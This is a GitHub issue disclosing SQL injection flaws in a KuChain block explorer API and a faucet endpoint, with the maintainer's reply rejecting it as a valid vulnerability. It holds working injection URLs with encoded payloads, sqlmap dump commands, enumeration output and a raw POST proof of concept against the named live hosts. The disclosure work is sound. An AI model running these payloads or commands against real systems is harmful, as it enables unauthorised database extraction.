Block Explorer Application - SQL Injection #11
Labels
improvement
Optimization and improvement to code
Comments
|
Hi, Thanks for your submission. We have tested the issue you mentioned and did notice it. Kindly note that all the data of KuChain is public data. An attacker can get all the public data by SQL Injection attacks, but it will not cause any practical impact on the chain. we admit this is a small oversight. Thanks for your reminder. As what I have said above, there won't be any practical impact delivered by the issue you mentioned, it will not affect the normal operation of the chain, and it is not in the scope from P1 to P4. After evaluation, we consider it is not a valid vulnerability but it does a good improve suggestion. Thanks for your attention and contribution! Please keep trying and help us improve our chain. Regards |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Block Explorer Web Application - SQL Injection Vulnerability
User submitted values were dynamically included in SQL statements without thorough sanitisation of special characters. SQL queries created in this way are often vulnerable to SQL Injection attacks. An attacker can leverage this issue to directly affect the SQL query syntax, potentially leading to the disclosure of database information, or even a compromise of the hosting server itself.
Vulnerable URL - https://explorer.kuchain.network
Vulnerable page and parameter
Steps to reproduce the behavior:
Open one of the following URLs in a web browser and notice the database error
https://explorer.kuchain.network/testNet/db/v1/plugin/tx_list?_t=1594723901489&block_height=&limit=10&msg_coin_creator=&msg_coin_symbol=&msg_receiver=&msg_sender=%27%7c%7ccast((select%20chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%20as%20numeric)%7c%7c%27&msg_type=&page=1&transfer_condition=and&tx_status=all
https://explorer.kuchain.network/testNet/db/v1/plugin/coin_list?_t=1594723888078&limit=10&page=1&symbol=%27%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C
Now run the following sqlmap command to extract the full database
./sqlmap.py -u "https://explorer.kuchain.network/testNet/db/v1/plugin/coin_list?_t=1594723888078&limit=10&page=1&symbol=1" --dbms=PostgreSQL --banner --random-agent -p symbol --dump
_[14:10:03] [INFO] the back-end DBMS is PostgreSQL
[14:10:03] [INFO] fetching banner
[14:10:04] [INFO] retrieved: 'PostgreSQL 12.3 (Debian 12.3-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3...
web application technology: Nginx
back-end DBMS operating system: Linux Debian
back-end DBMS: PostgreSQL
banner: 'PostgreSQL 12.3 (Debian 12.3-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3.0, 64-bit'
[14:10:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[14:10:09] [INFO] fetching current database
[14:10:10] [INFO] retrieved: 'public'
[14:10:10] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[14:10:10] [INFO] fetching tables for database: 'public'
[14:10:12] [INFO] retrieved: 'events'
[14:10:12] [INFO] retrieved: 'messages'
[14:10:13] [INFO] retrieved: 'transfer'
[14:10:14] [INFO] retrieved: 'block'
[14:10:15] [INFO] retrieved: 'err_table'
[14:10:16] [INFO] retrieved: 'account'
[14:10:17] [INFO] retrieved: 'acccoins'
[14:10:17] [INFO] retrieved: 'blockinfo'
[14:10:18] [INFO] retrieved: 'coins'
[14:10:19] [INFO] retrieved: 'delegation'
[14:10:20] [INFO] retrieved: 'delegation_change'
[14:10:21] [INFO] retrieved: 'lockacccoins'
[14:10:22] [INFO] retrieved: 'txmsgs'
[14:10:22] [INFO] retrieved: 'validator'
[14:10:23] [INFO] retrieved: 'tx'
[14:10:24] [INFO] retrieved: 'sync_stat'
[14:10:24] [INFO] fetching columns for table 'txmsgs' in database 'public'
[14:10:26] [INFO] retrieved: '_from'
[14:10:27] [INFO] retrieved: 'text'
[14:10:27] [INFO] retrieved: 'to'
[14:10:28] [INFO] retrieved: 'text'
[14:10:29] [INFO] retrieved: 'action'
[14:10:30] [INFO] retrieved: 'text'
[14:10:31] [INFO] retrieved: 'amount'
etc
Contact Information
m.avram.g@gmail.com
Note that this flaw should be fixed asap. Also, I think you better restrict public access to the API Swagger https://explorer.kuchain.network/testNet/
Kind Regards
EDIT 1:
Seems that the main site have the same issue
KuChain Betanet Faucet - Blind SQL Injection Vulnerability
Vulnerable URL: https://kuchain.network/faucet
Vulnerable Parameter: receiver
Method: POST
POC:
POST /portal-web/api/applyForTestFunds?lang=en_US HTTP/1.1
Host: kuchain.network
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://kuchain.network/faucet
Content-Type: multipart/form-data; boundary=---------------------------91872151416297495583940013683
Origin: https://kuchain.network
Content-Length: 217
Connection: close
-----------------------------91872151416297495583940013683
Content-Disposition: form-data; name="receiver"
SQLINJECTION
-----------------------------91872151416297495583940013683--
Using again sqlmap command line tool to extract sensitive information.
./sqlmap.py -u 'https://kuchain.network:443/portal-web/api/applyForTestFunds?lang=en_US' --data='receiver=test' --dbs --banner --random-agent --risk=3 --level=3 -p receiver
user : kuchain@172.31.186.12
database: jsapi
version: MySQL 8.0.18
database file location: /home/mysql/data/db
Regards
The text was updated successfully, but these errors were encountered: